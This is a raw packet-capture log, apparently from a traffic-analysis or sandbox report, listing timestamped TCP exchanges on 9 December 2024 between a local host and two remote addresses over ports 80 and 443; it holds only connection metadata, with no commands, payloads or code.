                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.404675007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.404813051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.405023098 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.405066013 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.405894995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.405965090 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.406142950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.406187057 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.406922102 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.406986952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.407061100 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.407108068 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.408042908 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.408418894 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.408422947 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.408461094 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.409125090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.409189939 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.409209967 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.409313917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.410293102 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.410341024 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.410496950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.410538912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.411289930 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.411341906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.411472082 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.411533117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.412410021 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.412584066 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.413156986 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.413609028 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.413619995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.413645983 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.413674116 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.414707899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.414750099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.415050983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.415765047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.415819883 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.416109085 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.416155100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.416840076 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.416886091 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.417042017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.417083025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.417920113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.418114901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.418158054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.419151068 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.419197083 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.419348001 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.419394970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.420176983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.420218945 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.420388937 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.420433998 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.421297073 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.421340942 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.421552896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.421603918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.422370911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.422415972 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.422830105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.422873020 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.423480988 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.423522949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.423590899 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.423634052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.424583912 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.424688101 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.424753904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.424789906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.425724030 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.425785065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.425842047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.425882101 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.426860094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.426904917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.426971912 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.427023888 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.428215027 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.428256989 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.428525925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.428570032 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.429064989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.429363012 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.429408073 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.430162907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.430243969 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.430305004 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.430342913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.431355000 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.431761026 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.432416916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.432427883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.432466030 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433041096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433084965 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433547020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433593035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433803082 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.433846951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.434627056 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.434684992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.435086966 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.435168028 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.435806036 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.435851097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.436115980 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.436181068 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.436796904 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.436842918 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.437077999 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.437124014 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.437887907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.438424110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.438477039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.439188957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.439233065 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.439387083 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.439431906 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.440138102 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.440179110 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.440401077 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.440443039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.441370964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.441433907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.441478014 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.442460060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.442595959 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.442950964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.443547964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.443591118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.443785906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.443866968 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.444536924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.444593906 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.444601059 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.444626093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.445617914 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.445709944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.445866108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.445904970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.446809053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.446852922 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.446974039 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.447021008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.447882891 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.447933912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.578763962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.579288006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.579301119 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.579372883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.579376936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.579417944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.580120087 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.580167055 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.580454111 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.580497980 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.581228971 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.581645012 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.581690073 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.582360983 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.582405090 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.582509995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.582554102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.583611965 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.583662987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.583878994 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.583925009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.584589958 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.584633112 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.584671974 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.584717035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590082884 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590092897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590136051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590529919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590576887 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590615988 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.590651989 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.591634989 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.591697931 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.591861010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.591901064 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.592792988 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.592843056 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.592900038 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.593846083 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.593894005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.594239950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.594281912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.594938040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.594988108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.595598936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.595640898 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.596036911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.596081018 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.596437931 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.596482992 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.597162008 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.597203016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.597322941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.597367048 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.598275900 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.598330021 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.598362923 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.598407030 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.599411964 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.599683046 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.599730015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600538969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600549936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600583076 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600610971 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600891113 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.600959063 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.601618052 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.601666927 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.601861000 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.601902962 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602185965 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602193117 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602474928 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602722883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602859020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.602906942 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.603678942 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.603724957 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.603785038 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.603801966 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.603861094 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.604091883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.604135036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.604896069 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.604949951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.605077982 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.606070995 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.606113911 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.606497049 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.606547117 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.607244968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.607292891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.607553959 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.607597113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.608275890 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.608324051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.608490944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.608537912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.609380960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.609424114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.609585047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.609628916 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.610420942 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.610465050 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.610625029 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.610667944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.611639023 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612040997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612098932 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612772942 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612821102 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612865925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.612915993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.613850117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.613899946 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.614038944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.614088058 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.614844084 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.614892960 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.614945889 CET8049923185.215.113.16192.168.2.6
